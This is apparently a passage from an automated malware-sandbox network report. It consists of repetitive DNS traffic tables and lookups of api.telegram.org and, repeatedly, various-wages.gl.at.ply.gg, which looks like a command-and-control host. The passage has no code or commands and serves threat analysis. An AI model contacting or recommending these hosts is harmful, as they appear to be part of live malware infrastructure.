                                                            Sep 25, 2024 08:33:27.081401110 CEST6372053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:27.088845968 CEST53637208.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:27.089015961 CEST6372053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:27.096276999 CEST53637208.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:27.096415997 CEST6372053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:27.103447914 CEST53637208.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:27.103593111 CEST6372053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:27.111156940 CEST53637208.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:27.111481905 CEST6372053192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:27.117741108 CEST53637208.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:31.687835932 CEST6213153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:31.695369005 CEST53621318.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:31.695631027 CEST6213153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:31.702598095 CEST53621318.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:35.848933935 CEST6303653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:35.855073929 CEST53630368.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:35.855238914 CEST6303653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:35.861515045 CEST53630368.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:35.861643076 CEST6303653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:35.867710114 CEST53630368.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:35.867877007 CEST6303653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:35.874275923 CEST53630368.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:35.874496937 CEST6303653192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:35.881453991 CEST53630368.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:35.987842083 CEST6353553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.122250080 CEST53635358.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.122479916 CEST6353553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.128812075 CEST53635358.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.129084110 CEST6353553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.135421038 CEST53635358.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.135571003 CEST6353553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.141949892 CEST53635358.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.142093897 CEST6353553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.149023056 CEST53635358.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.279022932 CEST5521953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.285469055 CEST53552198.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.285670042 CEST5521953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.293798923 CEST53552198.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.293955088 CEST5521953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.302068949 CEST53552198.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.302191019 CEST5521953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.309197903 CEST53552198.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.311194897 CEST5521953192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.317441940 CEST53552198.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.421636105 CEST6022853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.428134918 CEST53602288.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.428298950 CEST6022853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.434606075 CEST53602288.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.434742928 CEST6022853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.441550970 CEST53602288.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.441690922 CEST6022853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.448230982 CEST53602288.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.448357105 CEST6022853192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.454664946 CEST53602288.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.562105894 CEST5867153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.568702936 CEST53586718.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.568948030 CEST5867153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.575417995 CEST53586718.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.575613022 CEST5867153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.582010031 CEST53586718.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.582161903 CEST5867153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.588545084 CEST53586718.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.591288090 CEST5867153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.598256111 CEST53586718.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.706640959 CEST5641553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.713260889 CEST53564158.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.713443041 CEST5641553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.722094059 CEST53564158.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.722259045 CEST5641553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.731142044 CEST53564158.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.731323957 CEST5641553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.739804029 CEST53564158.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.739964008 CEST5641553192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.748152971 CEST53564158.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.858458996 CEST5012453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.868042946 CEST53501248.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:36.868211985 CEST5012453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:36.878537893 CEST53501248.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:41.683702946 CEST6343453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:41.690030098 CEST53634348.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:41.691356897 CEST6343453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:41.697776079 CEST53634348.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:46.431164980 CEST5814753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:46.439063072 CEST53581478.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:46.439239979 CEST5814753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:46.446183920 CEST53581478.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:46.446563959 CEST5814753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:46.453152895 CEST53581478.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:46.453293085 CEST5814753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:46.459619999 CEST53581478.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:46.459824085 CEST5814753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:46.466051102 CEST53581478.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:46.604046106 CEST5711353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:46.610697985 CEST53571138.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:46.613624096 CEST5711353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:46.620230913 CEST53571138.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:46.621815920 CEST5711353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:46.628459930 CEST53571138.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:46.629786968 CEST5711353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:46.637023926 CEST53571138.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:46.637655020 CEST5711353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:46.644186974 CEST53571138.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:49.765731096 CEST5825453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:49.773216009 CEST53582548.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:49.773400068 CEST5825453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:49.780844927 CEST53582548.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:49.780992031 CEST5825453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:49.789196014 CEST53582548.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:49.789331913 CEST5825453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:49.795932055 CEST53582548.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:49.796061039 CEST5825453192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:49.802463055 CEST53582548.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:53.459211111 CEST6178353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:53.465775967 CEST53617838.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:53.465974092 CEST6178353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:53.475274086 CEST53617838.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:53.475719929 CEST6178353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:53.482307911 CEST53617838.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:53.482475996 CEST6178353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:53.488961935 CEST53617838.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:53.489233971 CEST6178353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:53.495739937 CEST53617838.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.314479113 CEST5832253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.322998047 CEST53583228.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.323153019 CEST5832253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.331178904 CEST53583228.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.331301928 CEST5832253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.338834047 CEST53583228.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.338958979 CEST5832253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.346981049 CEST53583228.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.347089052 CEST5832253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.355370045 CEST53583228.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.469918966 CEST5760753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.477557898 CEST53576078.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.477730989 CEST5760753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.485235929 CEST53576078.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.485352039 CEST5760753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.492564917 CEST53576078.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.492676973 CEST5760753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.499749899 CEST53576078.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.499958992 CEST5760753192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.506654978 CEST53576078.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.623776913 CEST5368153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.631870985 CEST53536818.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.632060051 CEST5368153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.639082909 CEST53536818.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.639250040 CEST5368153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.647315025 CEST53536818.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.647643089 CEST5368153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.663157940 CEST53536818.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.663314104 CEST5368153192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.675050974 CEST53536818.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.782957077 CEST5769353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.789160013 CEST53576938.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.789355993 CEST5769353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.795468092 CEST53576938.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.796920061 CEST5769353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.803347111 CEST53576938.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.803672075 CEST5769353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.809988022 CEST53576938.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.810153008 CEST5769353192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.816546917 CEST53576938.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.924375057 CEST5405253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.930860996 CEST53540528.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.931221008 CEST5405253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.937335014 CEST53540528.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.937508106 CEST5405253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.944288969 CEST53540528.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.944617987 CEST5405253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.950779915 CEST53540528.8.8.8192.168.2.22
                                                            Sep 25, 2024 08:33:58.951076031 CEST5405253192.168.2.228.8.8.8
                                                            Sep 25, 2024 08:33:58.957225084 CEST53540528.8.8.8192.168.2.22
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Sep 25, 2024 08:30:06.919917107 CEST192.168.2.228.8.8.80xee91Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:30:08.218153954 CEST192.168.2.228.8.8.80xfc62Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:30:12.515623093 CEST192.168.2.228.8.8.80xf206Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:30:18.411354065 CEST192.168.2.228.8.8.80xcfdStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:30:23.731686115 CEST192.168.2.228.8.8.80xc4a3Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:30:29.010267019 CEST192.168.2.228.8.8.80x28f2Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:30:32.687982082 CEST192.168.2.228.8.8.80x3adStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:30:38.301603079 CEST192.168.2.228.8.8.80xd0f6Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:30:41.531122923 CEST192.168.2.228.8.8.80x30b7Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:30:44.962779045 CEST192.168.2.228.8.8.80xb020Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:30:48.677516937 CEST192.168.2.228.8.8.80x11d4Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:30:53.309386015 CEST192.168.2.228.8.8.80xb46fStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:30:57.553385019 CEST192.168.2.228.8.8.80xf619Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:02.216763020 CEST192.168.2.228.8.8.80x1107Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:05.695902109 CEST192.168.2.228.8.8.80x67e4Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:09.798326015 CEST192.168.2.228.8.8.80x55bdStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:09.887406111 CEST192.168.2.228.8.8.80x55bdStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:13.636140108 CEST192.168.2.228.8.8.80xfc67Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:13.645436049 CEST192.168.2.228.8.8.80xfc67Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:13.654268980 CEST192.168.2.228.8.8.80xfc67Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:13.663250923 CEST192.168.2.228.8.8.80xfc67Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:13.670542955 CEST192.168.2.228.8.8.80xfc67Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:13.825798035 CEST192.168.2.228.8.8.80x847dStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:13.833000898 CEST192.168.2.228.8.8.80x847dStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:13.839982033 CEST192.168.2.228.8.8.80x847dStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:13.847584963 CEST192.168.2.228.8.8.80x847dStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:13.854867935 CEST192.168.2.228.8.8.80x847dStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:13.983556032 CEST192.168.2.228.8.8.80x8e9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:13.990964890 CEST192.168.2.228.8.8.80x8e9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:13.998280048 CEST192.168.2.228.8.8.80x8e9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:14.006102085 CEST192.168.2.228.8.8.80x8e9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:14.013638973 CEST192.168.2.228.8.8.80x8e9Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:14.169218063 CEST192.168.2.228.8.8.80xbb80Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:14.176469088 CEST192.168.2.228.8.8.80xbb80Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:14.183782101 CEST192.168.2.228.8.8.80xbb80Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:14.191034079 CEST192.168.2.228.8.8.80xbb80Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:14.198263884 CEST192.168.2.228.8.8.80xbb80Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:18.148466110 CEST192.168.2.228.8.8.80xa17aStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:18.164880037 CEST192.168.2.228.8.8.80xa17aStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:18.179203987 CEST192.168.2.228.8.8.80xa17aStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:18.192790031 CEST192.168.2.228.8.8.80xa17aStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:18.206275940 CEST192.168.2.228.8.8.80xa17aStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:18.338043928 CEST192.168.2.228.8.8.80xb4caStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:18.352761984 CEST192.168.2.228.8.8.80xb4caStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:18.366055965 CEST192.168.2.228.8.8.80xb4caStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:18.379731894 CEST192.168.2.228.8.8.80xb4caStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:18.391954899 CEST192.168.2.228.8.8.80xb4caStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:21.631145954 CEST192.168.2.228.8.8.80xc11dStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:21.638601065 CEST192.168.2.228.8.8.80xc11dStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:21.645864964 CEST192.168.2.228.8.8.80xc11dStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:21.652753115 CEST192.168.2.228.8.8.80xc11dStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:21.659867048 CEST192.168.2.228.8.8.80xc11dStandard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:21.783317089 CEST192.168.2.228.8.8.80xc073Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:21.791271925 CEST192.168.2.228.8.8.80xc073Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:21.798124075 CEST192.168.2.228.8.8.80xc073Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:21.805221081 CEST192.168.2.228.8.8.80xc073Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:21.812423944 CEST192.168.2.228.8.8.80xc073Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:24.852963924 CEST192.168.2.228.8.8.80xc407Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:24.861177921 CEST192.168.2.228.8.8.80xc407Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:24.868199110 CEST192.168.2.228.8.8.80xc407Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:24.874979973 CEST192.168.2.228.8.8.80xc407Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:24.883222103 CEST192.168.2.228.8.8.80xc407Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:29.311150074 CEST192.168.2.228.8.8.80xce24Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:29.323235989 CEST192.168.2.228.8.8.80xce24Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:29.335155010 CEST192.168.2.228.8.8.80xce24Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:29.342314959 CEST192.168.2.228.8.8.80xce24Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:29.349699020 CEST192.168.2.228.8.8.80xce24Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:33.852998018 CEST192.168.2.228.8.8.80x24c8Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:33.866600990 CEST192.168.2.228.8.8.80x24c8Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:33.873711109 CEST192.168.2.228.8.8.80x24c8Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:33.880994081 CEST192.168.2.228.8.8.80x24c8Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:33.888680935 CEST192.168.2.228.8.8.80x24c8Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.008805037 CEST192.168.2.228.8.8.80xc3e7Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.016288996 CEST192.168.2.228.8.8.80xc3e7Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.023709059 CEST192.168.2.228.8.8.80xc3e7Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.030574083 CEST192.168.2.228.8.8.80xc3e7Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.038151026 CEST192.168.2.228.8.8.80xc3e7Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.149380922 CEST192.168.2.228.8.8.80x96a4Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.156585932 CEST192.168.2.228.8.8.80x96a4Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.163672924 CEST192.168.2.228.8.8.80x96a4Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.170867920 CEST192.168.2.228.8.8.80x96a4Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.177341938 CEST192.168.2.228.8.8.80x96a4Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.297002077 CEST192.168.2.228.8.8.80xfa18Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.303854942 CEST192.168.2.228.8.8.80xfa18Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.310992002 CEST192.168.2.228.8.8.80xfa18Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.318326950 CEST192.168.2.228.8.8.80xfa18Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.325253963 CEST192.168.2.228.8.8.80xfa18Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:38.785799980 CEST192.168.2.228.8.8.80xb898Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:38.855537891 CEST192.168.2.228.8.8.80xb898Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:38.973041058 CEST192.168.2.228.8.8.80xb898Standard query (0)various-wages.gl.at.ply.ggA (IP address)IN (0x0001)false
